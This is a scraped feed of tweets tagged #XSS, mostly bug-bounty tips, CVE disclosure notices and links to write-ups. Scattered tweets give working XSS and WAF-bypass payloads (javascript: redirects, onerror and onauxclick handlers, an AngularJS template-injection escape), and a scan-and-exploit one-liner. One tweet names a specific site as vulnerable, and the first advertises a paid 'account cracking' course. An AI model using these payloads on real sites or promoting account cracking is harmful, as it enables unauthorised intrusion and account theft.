@ByUnknwa year agoHi everyone I'm going to run a mini training course on hacking in 3 parts 1 : Ethical Hacking 2 : Account cracking 3 : SQL vulnerabilities, XSS, Dorks The mini course costs 10 euros and includes the tools, the ebooks for these 3 parts as well as the configs for account cracking
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoDeserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption https://t.co/7UWeygfkuQ #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1609967885568602115/7Y1ySJZ3_normal.jpg)
Ryx
@PadhiyarRushia year agoIgnore the tags: #XSS #WebSecurity #Cybersecurity #ApplicationSecurity #OWASP #SecurityVulnerability #WebApplicationSecurity #PenetrationTesting #WebDevelopment #Privacy #Cybercrime #WebDev #OWASPTop10 #BugBounty #WhiteHatHacking #SecurityAwareness #Thread #Indian #Secure
![profile](https://pbs.twimg.com/profile_images/1609967885568602115/7Y1ySJZ3_normal.jpg)
Ryx
@PadhiyarRushia year ago🧵Thread #️⃣3️⃣: 📌A Detailed Guide on Understanding XSS - Cross Site Scripting #Infosec #Cybersecurity #XSS #BugBounty
![profile](https://pbs.twimg.com/profile_images/1469322057565577216/fdn7eQHv_normal.jpg)
Federico Hansen
@Stuckerbsasa year agoYour fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news 📖 Read (https://t.co/SAY0w9gYcH) via "The Daily Swig" #cybersec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoDeserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption #cybersecurity #infosec https://t.co/cSmhmIMRV1
![profile](https://pbs.twimg.com/profile_images/1608512503910404102/U7cKFcIc_normal.jpg)
Jefferson Gonzales
@gonzxpha year agoFinal payload to bypass the WAF /login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain --> xss pop-up Thanks @HoseinVita for this amazing payload [2/2] #bugbountytip #bugbountytips #BugBounty #xssbypass #Cloudflare
![profile](https://pbs.twimg.com/profile_images/1608512503910404102/U7cKFcIc_normal.jpg)
Jefferson Gonzales
@gonzxpha year ago[Bypass Cloudflare] Open Redirect to XSS Open Redirect /login?redirectUrl=//evil,org --> redirect to evil,org Escalate to XSS /login?redirectUrl=javascript:alert(1) --> blocked by WAF [1/2] #bugbountytip #bugbountytips #infosec #BugBounty https://t.co/0bdo8ekd2k
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoCracked XSS — Intigriti Challenge 0223 by Dr. Leek https://t.co/Vr8coGcNDn #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoMy first finding XSS,IDOR https://t.co/0Ht2TPg5nq #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0934): Cross-site Scripting (XSS) - Stored in answerdev/answer. https://t.co/whqjgy5R7A Disclosed by https://t.co/aKBbCMtEmM, fixed by @answerdev... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoToxssin – Open-source Penetration Testing Tool That Automates Exploiting Cross-Site Scripting (XSS) https://t.co/LCUEzS4DyN #Pentesting #CyberSecurity #Infosec https://t.co/mmDhEaWisw
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoThe Dangers of SVG Files: A Lesser-Known Vector for XSS Attacks #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoXSS payload to capture login credentials - Visit https://t.co/uGzhHMbXf1 for the solution. #xss #javascript #infosec #engineer #code
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Bugbountytips, Xss]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@SMHTahsin33 @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1606472136524283905/wQ50BJAj_normal.jpg)
Anthony
@_c3rb3ru5__a year ago#xss #hacking #hackingweb
![profile](https://pbs.twimg.com/profile_images/1423533552575016962/DGtXpJsl_normal.jpg)
Fullstack CISO
@FullStackCISOa year agoChatGPT as a Cybersecurity Assistant. Some interesting use cases in this article: * What happened in this log file? * Is this code vulnerable to XSS? * Convert this shellcode into Python #cybersecurity #chatgpt https://t.co/kRB2sGG5dr https://t.co/UEBkdqE4KK
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs DOM XSS attack possible on website that is not using JavaScript? - Visit https://t.co/G26OXN6svw for the answer. #xss #javascript #server #infosec #technology
![profile](https://pbs.twimg.com/profile_images/1571530221081464832/Dpzt9ssY_normal.jpg)
L0K1
@Chamal_akilaa year ago#100DaysOfHacking #infosec #Redteam day 3 DOM XSS in document.write @PortSwigger academy
![profile](https://pbs.twimg.com/profile_images/1589551161979199488/Xhbn9k2G_normal.jpg)
Sheon Han
@sheonhana year agoBing/Sydney wrote "I could hack into any system" So it seems like what it needs to start hacking is, simply, access to headless Chrome API (like puppeteer)? Isn't that enough to start XSS or SQL injection? (Cuz using models to perform actions isn't new https://t.co/CK2iis5nkd)
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIs cross site scripting possible with the img alt attribute? - Visit https://t.co/Wx0xt7qbmJ for the answer. #xss #infosec #engineer #datascience #100daysofcode
![profile](https://pbs.twimg.com/profile_images/1624837985698029568/pG9qHwnl_normal.jpg)
Mateusz Kozłowski
@matikozlowskia year ago4⃣ XSS - script example #XSSAttack #Cybesecurity #infosec #security #tech #JS https://t.co/PUOFCfbBzz
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: xss-and-html-injection-on-(-https://labs-history-state-gov)byismailu - https://t.co/KUFIUvefvH #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1624837985698029568/pG9qHwnl_normal.jpg)
Mateusz Kozłowski
@matikozlowskia year ago4⃣ XSS - scenario: A malicious user creates a link that contains a malicious script and posts it on a website or email. When someone clicks on the link, the script is executed and can access the user's cookies. #XSSAttack #Cyberscurity #infosec #security #tech
![profile](https://pbs.twimg.com/profile_images/1624837985698029568/pG9qHwnl_normal.jpg)
Mateusz Kozłowski
@matikozlowskia year ago4⃣ XSS The attack works by injecting malicious code into webpages, allowing attackers to steal user data or even take control of a user's browser. #XSSAttack #Cyberscurity #infosec #security #tech
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/mzC6f4fCuD Stars: 2 Watching: 1 Last change: Feb 17, 2023 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1611388763602550784/a0-x8OLH_normal.png)
YesWeHack ⠵
@yeswehacka year ago#22 Vulnerable Snippet {{ solution }} ☑️ See more content on our blog: https://t.co/EBDiUvVlre Bug: XSS/Open Redirect 📛 Lang: JavaScript ⚡️ Check out the explanation in the image below!👇 #YesWeRHackers #BugBounty #YWHSnippet https://t.co/7mRRRLvRFi
![profile](https://pbs.twimg.com/profile_images/1627584048884490240/COXWsJSV_normal.jpg)
Saif abdullah khan🇧🇩
@0xmahia year agoRecon Recon Recon!! Shodan Dorking Always wins. ssl:"Company Inc" Filter results by http title. Start fuzzing an interesting asset. Found swagger-ui/ Tried swagger ui xss with https://t.co/UE3oaaoh6j #bugbountytips #BugBounty https://t.co/4dwmaHiUW5
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ xss and html injection on ( https://t.co/ReR5PLdK3a) 👨💻 @@_ismailu ➟ U.S. Department of State 🟧 Medium 💰 N/A https://t.co/SWAcmzESWB #bugbounty #bugbountytips #cybersecurity https://t.co/z3PlQEqalH
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0879): Cross-site Scripting (XSS) - Stored in btcpayserver/btcpayserver. https://t.co/5z0Le24OWO Disclosed by https://t.co/lfwbLJ1nAR, fixed by @BtcpayServer... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0878): Cross-site Scripting (XSS) - Generic in nuxt/framework. https://t.co/cjdCZKXZmc Disclosed by https://t.co/I1YxmrfsDA, fixed by @danielcroe... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1586304872395202561/j1V90xCg_normal.jpg)
insane_Coder
@AnounimMa year agoToday I was able to find 2 reflected XSS, and now in all my career I have found like 15-20 XSS. Here is the payload I use for the last 2 finds: https://t.co/9fjvv7aWVx #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1614146891801071616/vyRVpaVr_normal.jpg)
Hacker Vlog
@vlog_hackera year agoXSS payloads to bypass Cloudflare 🤣 javascript:{ alert`0` } 1'"><img/src/onerror=.1|alert``> #bughunting #cybersecuritytips #Hacking #xss #Cloudflare #BugHunter #HackerNews
![profile](https://pbs.twimg.com/profile_images/1609565868337274880/dUUDse3__normal.jpg)
NS 🍥
@nav1n0xa year agoQuick! Let's find XSS..... #BugBounty memes.. https://t.co/XTo4rDgH56
![profile](https://pbs.twimg.com/profile_images/1217734356640256000/ABSVcm4l_normal.jpg)
N45HT
@N45HTOfficiala year agoExploiting XSS via Markdown on Xiaomi #infosec #bugbountytips https://t.co/0DiJ4QwnuG https://t.co/a4xguz8yHd
![profile](https://pbs.twimg.com/profile_images/1601981938302353409/0mNj-Nqv_normal.jpg)
Mahshooq Zubair
@mq_xz_a year agoHacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on https://t.co/Sl0UYmKKww by: niraj1mahajan https://t.co/IwhKBSUG7i #BugBounty #WriteUps
![profile](https://pbs.twimg.com/profile_images/1625898847959494661/N7VhAfBD_normal.jpg)
Nik H
@Nikahversea year agoA curated LIST of bugbounty WRITEUPs [I love lists] They are categorized by topics such as XSS, SQL injection, CSRF, etc https://t.co/kyChnq4ypZ #bugbounty #bugbountytips #cybersec #cybersecurity #infosec #infosecurity #web
![profile](https://pbs.twimg.com/profile_images/1417192567418998785/wyUpZalF_normal.jpg)
Today Cyber News
@TodayCyberNewsa year agoCSP Bypass for XSS ( 1/2 ) You need to look here for a CSP bypass for XSS when there is an allowed list of sources like https://t.co/X65ZDTDzIo , https://t.co/VD22OiGBAD , etc. #bugbountytips #BugBounty #cybersecurite #infosec https://t.co/oT2S6HAEEt
![profile](https://pbs.twimg.com/profile_images/1518489933513900032/1bpLViPw_normal.jpg)
The BBH
@OfficalTeamBBHa year agoBeginner Bug Bounty Hunters: Uncover the Secret of Finding XSS in 2023! https://t.co/agl9Q0W1Ji via @YouTube #OpenSource #bugbounty #bugbountytips #bounty #cybersecurity #instacybersecurity #instainfosec #instasecurity #instacyber #instaopensource #programming
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoWAF Bypass + XSS on The MOST Popular Movie Ticket website. https://t.co/zx1C7cbIyC #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoHacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on https://t.co/zARa6whoLZ https://t.co/5P5PzieSmd #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1581651852269068289/FBrjFxPm_normal.jpg)
Fat
@fattselimia year agoFindings of the day 1st : Reflected XSS via vulnerable GET Parameter in a Private Program Payload used : ‘-confirm(document.domain)-‘ 2nd : Information disclosure in a VDP #bugbounty #bugbountytips #infosec #cybersecurity #cybersecurityawareness https://t.co/NQyCiBHEPL
![profile](https://pbs.twimg.com/profile_images/1625151294565646338/mQ7oACIO_normal.jpg)
Naisya Girl Security
@naigirlseca year agoJust joined as a member of berachforum and already acting cocky; once in a while, go join the Russians' forum over there https://t.co/4hpGNDrhFf so you can also understand Malware and Ransomware issues. Makes sense though, Russia is full of the same thing as this https://t.co/5FSCaFOaay
![profile](https://pbs.twimg.com/profile_images/1622254658197626881/eSJY6OVU_normal.jpg)
Haytham
@Hayth3ama year ago#bugbountytip echo “target,com” | waybackurls | gf xss > xss.txt for URL in $(</xss.txt); do (python3 https://t.co/xfgAlyic6b -t 1 -d 1 -u "${URL}" --skip > xsstriker.txt ); done To see progress in another terminal type: tail -f xsstriker.txt #infosec #BugBounty #CyberSec
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year agoXSS PoC - AI Generated: 1. https://t.co/vthjqUDKtL 2. Prompt w/ description 3. Export to JSFiddle 4. Host it 5. Include external script 6. Escalate your alert() #bugbountytips #infosec #xss #ai #GPT 👇🧵 for Prompt & Code https://t.co/uJ4sQ2dfGd
![profile](https://pbs.twimg.com/profile_images/1625150892994592768/mMlTDMHc_normal.jpg)
GSM PM SHA
@GSMPMCYBERa year agoXSS may be used by attackers to bypass access controls. #success #bugbounty #vulnerabilities #xss #210goals
![profile](https://pbs.twimg.com/profile_images/1606257844075958272/tvS3goal_normal.jpg)
Niraj Mahajan
@niraj1mahajana year agoHello Researchers, “Hacking the Search Bar: The Story of Discovering and Reporting an XSS Vulnerability on https://t.co/L8GNqNa7cM” https://t.co/3tFGUevfVT #bugbounty #bugbountytip #xss #xssattack #microsoft #microsofthalloffame #cybersecurity #infosec #websecurity #pentesting https://t.co/yMm0o09vw2
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoCloudflare bypass & template injection to XSS in one shoot {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} #cloudflare #bypass #xss #SysBraykr #BugHunting #InfoSec #WeBreakIt2SecureIt
![profile](https://pbs.twimg.com/profile_images/1615635745636589569/gbAt5NNP_normal.jpg)
🐞Sara Badran
@SaraBadran18a year ago📌SQl injection, Session fixation, Stored XSS, Reflected XSS in @osTicket 🔥 -- Publication date: 2023-02-14 -- By Miguel Correia & Davide Teixeira -- https://t.co/kgBhdSUMuw -- #hackerone #BugBounty #bugbountytips #hackeronereport #Bugbountywriteupspublished #bugbountytip https://t.co/yqyYEGvo7d
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoBug Bounty tips: Focus on testing the business logic of the application. Many vulnerabilities are found by examining the way that the application processes and stores data, rather than simply testing for standard vulnerabilities like XSS or SQL injection. #BugBountyTips
![profile](https://pbs.twimg.com/profile_images/1522484105018941441/dV8P_Hm6_normal.jpg)
tmz900
@tmz900a year ago2 CSRF, 1 SQLi, some XSS an interesting xss bug: /directory/ => 403 /x/%2e%2e;/directory/ => 200 the path reflect response and boom xss: /x/%2e%2e;/directory/--><script>alert(123)</script> #sqli #xss #csrf #bugbountytips #bugbounty https://t.co/16zFHojebr
![profile](https://pbs.twimg.com/profile_images/1255015535416193024/ggrb9Zoh_normal.jpg)
Hack Reports
@HackReportsa year agoSecure up your website! A popular hacking aid just released a CORS misconfig detection function, so you can assess the security of your website in no time. #cybersecurity #websecurity https://t.co/Z7I1CZjp0Y
![profile](https://pbs.twimg.com/profile_images/1573053235417473040/O7J15mS5_normal.jpg)
LinuxSecurity
@LS_Advisoriesa year agoFedora 37: phpMyAdmin 2023-179053442b - **phpMyAdmin 5.2.1** This is a bugfix release that also contains a security fix for an XSS vulnerability in the drag-and-drop... @lnxsec #Fedora #Linux #infosec #opensource #linuxsecurity https://t.co/yAVNQM3AP1 https://t.co/Y9n963Nhvp
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoAkamai WAF bypass through right-click ⚡️ <details onauxclick=confirm`xss`></details> #xSS #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoCloudflare bypass & template injection to XSS in one shoot ⚡️ {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} #infosec #cybersec #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoEasy short Xss Tips ⚔️ 1.⚙️Subdomain enumeration 2.⚙️S3 bucket with access denied 3.⚙️Ffuf found -> /cdn/ 4.⚙️Ffuf found -> /cdn/proxy.html 5.⚙️blank page -> view source, found url param (document.location) 6.⚙️?url=javascript:alert () XSS popped up ⚙️ #infosec #cybersec
![profile](https://pbs.twimg.com/profile_images/1599163608394760192/heTS-SJu_normal.jpg)
Heli9
@Heli__9a year agoThe @intigriti xss challenge videos are great for someone who is trying to learn dom xss and become more advanced in xss in general #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoShould every output element be filtered, or just those which contain user-editable data? - Visit https://t.co/soUT5HuNrb for the answer. #php #xss #mysql #html #infosec
![profile](https://pbs.twimg.com/profile_images/1608857805112352768/pyuf_Ail_normal.jpg)
Gotcha1G
@AnissArrasa year ago@_mrd7_ Xss in first the 5min when i started bugbounty 😂
![profile](https://pbs.twimg.com/profile_images/1625918832035483649/BsR0R2I0_normal.jpg)
syngularity
@syngularity1a year agoMy #dell #cisco #hpe #arubanetworks exploit talk from @WWHackinFest is up. I use persistent #xss, #codeinjection to bypass #vlan controls, tunnel IPv4 to 6 without a router, take over network, create an undetectable #exfiltration protocol. . #Hacking #exploit Still unfixed! https://t.co/a4FdhNMGic
![profile](https://pbs.twimg.com/profile_images/1561195913908916225/Z5-Ax5Ll_normal.jpg)
Jackson
@JacksonHHaxa year ago@0xsomnus It’s so easy to say programming is not needed in infosec and then go back to running nuclei and popping XSS on your local cafe’s website. But you will hit a skill ceiling and realise that programming is needed to transcend it. Can’t believe your tweet got so much hate 😂
![profile](https://pbs.twimg.com/profile_images/1614663919897030657/yjn45UmE_normal.jpg)
Deepak Dhiman🇮🇳
@Virdoex_huntera year agoTip: if you found reflected xss but not able to fully exploit it just change the xss payload with blind xss one and see the result #bugbountytips #xss @theXSSrat @ADITYASHENDE17 @GoogleVRP @sunilyedla2 @RanjitAdhikar34 @bug_vs_me 😋😋 https://t.co/jS92DEHHlE
![profile](https://pbs.twimg.com/profile_images/1626566765235806210/6OZw-50S_normal.jpg)
Mr.P1P0
@fxy0x0001a year agoThis website has a reflected #xss vulnerability. https://t.co/OCK2fnZ7lA You can test it in the relevant search section. #rapsodimobilya #mobilya #hack #hacking #xss #reflectedxss #cyberattack In the search section
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0827): Cross-site Scripting (XSS) - Stored in pimcore/pimcore. https://t.co/kAaMi68KKw Disclosed by @sanket_722, fixed by pimcore maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1488536755234086914/PSFjnZ5L_normal.jpg)
Security Temple
@Securitytemplea year agoExploiting Persistent XSS | Ken Pyle | WWHF Deadwood 2022 https://t.co/jTkmDeJtBb #bugbounty, #computer, #cyber, #ethical, #hacked, #hacker, #hacking, #hunting, #infosec, #learn, #news, #pc, #pentest, #security, #threat, #tutorial
![profile](https://pbs.twimg.com/profile_images/1573053235417473040/O7J15mS5_normal.jpg)
LinuxSecurity
@LS_Advisoriesa year agoFedora 36: phpMyAdmin 2023-c713d12577 - **phpMyAdmin 5.2.1** This is a bugfix release that also contains a security fix for an XSS vulnerability in the drag-and-drop... @lnxsec #Fedora #Linux #infosec #opensource #linuxsecurity https://t.co/oCf82N46T4 https://t.co/Qjq4vnre4T
![profile](https://pbs.twimg.com/profile_images/1483865985262428160/kXeW1JrM_normal.jpg)
Udit Bhadauria
@udit_thakkura year agoFound a pre-auth #xss 0-day today with @ProngedF that affects around 200k hosts on the internet. #BugBounty #infosec #cybersecurity #0day #Hacking
![profile](https://pbs.twimg.com/profile_images/1530813398807625737/bcGzBPQo_normal.jpg)
Save to Notion
@SaveToNotiona year ago@proawez This thread is saved to your Notion database. Tags: [Xss, Bugbountytips]
![profile](https://pbs.twimg.com/profile_images/1560608444297666561/CcVF9Do__normal.jpg)
1337aweyz
@proaweza year ago@shrekysec @zseano @SaveToNotion #thread #bugbountytips #xss
![profile](https://pbs.twimg.com/profile_images/1056305854826340354/70f7AHS7_normal.jpg)
Abood Nour 🇵🇸
@AboodNoura year agoSeveral people managed to solve this through creative yet unintended solutions. So lets raise the bar a little bit more 😅 Here is a slightly modified version to make it even more interesting Can you still beat it? https://t.co/ZymJ2yxnZ3 #XSS #CTF #BugBounty https://t.co/rtKTXfkAJQ https://t.co/qjIbl5Zsn4
![profile](https://pbs.twimg.com/profile_images/1217734356640256000/ABSVcm4l_normal.jpg)
N45HT
@N45HTOfficiala year agoKNOXSS on Xiaomi #infosec #bugbountytips #xss https://t.co/LCgX7mm5hw
![profile](https://pbs.twimg.com/profile_images/1574025330649505799/OGhM5V36_normal.jpg)
HK
@Harsh66071a year agoFound 4 XSS vulnerabilities on this last year, and this year again another XSS. Always keep an eye on the updates the application is pushing ✔️ #bugbountytip #BugBounty #XSS https://t.co/msLa3naSIq
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0810): Cross-site Scripting (XSS) - Stored in btcpayserver/btcpayserver. https://t.co/kXN6KMwvUM Disclosed by @@d47sec, fixed by @BtcpayServer... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1571605415091216387/JQ9dO5Qm_normal.jpg)
Jinjo 🇹🇳
@TytylolMarka year ago[#bugbountytips #bugbountytip https://t.co/oHMoeaoC7b
![profile](https://pbs.twimg.com/profile_images/411769767658156032/04S-RSgy_normal.jpeg)
Erlend Oftedal
@webtonulla year ago«Introducing Frontjacking. Frontend server hijacking is a hacking technique that combines CRLF injection, HTTP request header injection and XSS, exploiting a poorly configured reverse proxy deployed with a shared hosting environment» https://t.co/UfWvMNGgLP
![profile](https://pbs.twimg.com/profile_images/1591304860661874689/aVmsrpZg_normal.jpg)
Faiyaz Ahmad
@FaIyaZz007a year agoHi everyone! I have created a new video on "Cross Site Scripting Automation" that will help you to find XSS in automated way. Check it out: https://t.co/WiK0CG3dbL #cybersecurity #informationsecurity #ethicalhacking #bugbounty #bugbountytips #penetrationtesting https://t.co/SAjXtPCPJ8
![profile](https://pbs.twimg.com/profile_images/1619947865500966912/DPho3gfp_normal.jpg)
0xD3ADC0DE
@0xd3adcodea year agoNew report has been submitted on @Hacker0x01 , time to catch new XSS! @AmericanAir #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1625466430631079936/rjSalseQ_normal.jpg)
secrukh
@SecRukha year agoIf you are looking how to bypass CSP for XSS exploitation and source contains https://t.co/QltJpHU0dy or https://t.co/ERkwGkdP9b check this repos: https://t.co/Ul6dfgwBaO https://t.co/LG0Y3BESFZ Also check the blogpost: https://t.co/kOon3VS8Fz #bugbounty #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1543004636931624963/24sdKyWZ_normal.jpg)
Parrot CTFs
@parrot_ctfsa year agoGive us your best shot! Best description will get a month free of pro! . #code #review #c #flaw #bof #cve #xss #xxe #sqli #codeinjection #injection #inject #hacker #hacking #hackerone #hackthebox #tryhackme #picoctfs #parrotctfs #ctf #bugbounty #bugcrowd #microsoft #meme #cyber https://t.co/fKIN6uLAv1
![profile](https://pbs.twimg.com/profile_images/1595164703952543749/CkMzsDcT_normal.jpg)
def1ant
@0xdef1anta year agoAnother reflected XSS triaged :) #xss #bugbounty #infosec #hackerone https://t.co/WyusPi6ltW
![profile](https://pbs.twimg.com/profile_images/1089185605911752705/e8j99QcU_normal.jpg)
infosec-jobs.com
@infosec_jobsCOMa year agoHIRING: Senior Web Security Engineer (Frontend) / Europe https://t.co/MDoG7QBNNR #InfoSec #InfoSecJobs #Cybersecurity #jobsearch #hiringnow #CyberCareers #Europe #Audits #Blockchain #ComputerScience #Crypto #CSRF #Finance #JavaScript #Nodejs #OWASP #Privacy #XSS
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoCSP: What is script-src-attr and script-src-elem? - Visit https://t.co/crYf5FqCne for the answer. #xss #javascript #content_security_policy #header #infosec
![profile](https://pbs.twimg.com/profile_images/1558902617060818946/ky6rBEOY_normal.jpg)
القبعة البيضاء
@whitehat281a year ago1. Invicti Invicti is a web application security scanner hacking tool to find SQL Injection, XSS, and vulnerabilities in web applications or services automatically. It is usually available on SAAS solution Features: https://t.co/KiMCe25RWK
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0794): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/UP0QXqWKKS Disclosed by https://t.co/BeDJ5NpqYv, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0791): Cross-site Scripting (XSS) - Stored in thorsten/phpmyfaq. https://t.co/vOqVXN1AVl Disclosed by https://t.co/QztBTN7NZA, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0787): Cross-site Scripting (XSS) - Generic in thorsten/phpmyfaq. https://t.co/4HJQPpY5bS Disclosed by https://t.co/QztBTN7NZA, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0786): Cross-site Scripting (XSS) - Generic in thorsten/phpmyfaq. https://t.co/2Q2euOJ7E7 Disclosed by https://t.co/BeDJ5NpqYv, fixed by @ThorstenRinne... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1548342682140811265/_4Eeyz4d_normal.jpg)
Siddharth Chhetry
@jeetbhdra year agoNever in my life I thought my Blind XSS payload will fire:) But thank god it did -;- #BugBounty
![profile](https://pbs.twimg.com/profile_images/1625697062200266752/YZCn5YN5_normal.png)
Mr Noone
@MrNoone67477746a year agoimg-src *; via XSS (iframe) - Time attack ---- SOP bypass Vulnerable sites https://t.co/Nw7pj1QAOD https://t.co/bzAMY0jIBb https://t.co/RNgQhxb48d #github #git #BugBounty
![profile](https://pbs.twimg.com/profile_images/1559981105553481729/W122CYaC_normal.jpg)
Adam Langley
@adamtlangleya year agoTry your hacking skills against real world like challenges at https://t.co/hvdpm2hROt we cover blind XSS, SSRF, CSRF, recon, OSINT, asset and subdomain discovery, subdomain takeovers, auth issues, LFI, SQLi, session hijacking & much more! It’s a great place to hone your skills!
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🍖 HackerOne: HTML injection that may lead to XSS on https://t.co/hjo5nOdl4U through H1 Triage Wizard Chrome Extension 👉 https://t.co/3cVBIQV2Zi Source: HackerOne Hacktivity #infosec #hackers #datasecurity Follow @HackersFeed_io 🐦 for InfoSec content
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
